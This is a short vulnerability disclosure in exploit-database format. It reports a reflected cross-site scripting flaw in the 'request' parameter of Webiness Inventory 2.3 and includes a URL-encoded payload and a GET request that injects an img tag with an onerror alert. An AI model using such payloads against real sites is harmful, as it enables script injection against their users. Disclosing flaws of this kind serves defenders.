===========================================================================================
# Exploit Title: Webiness Inventory 2.3 - 'request' XSS Vulnerability
# Dork: N/A
# Date: 10-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/webinessinventory/files/
# Software Link: hhttps://sourceforge.net/projects/webinessinventory/files/
# Version: 2.3
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Small stock inventory managment application for web.
===========================================================================================
# POC - XSS
# Parameters : request
# Attack Pattern : %22%3e%3ciMg+src%3dN+onerror%3dalert(9)%3e
# GET Request: http://localhost/webiness/index.php?request="><iMg src=N onerror=alert(9)>
# https://i.hizliresim.com/lqQDkb.jpg
===========================================================================================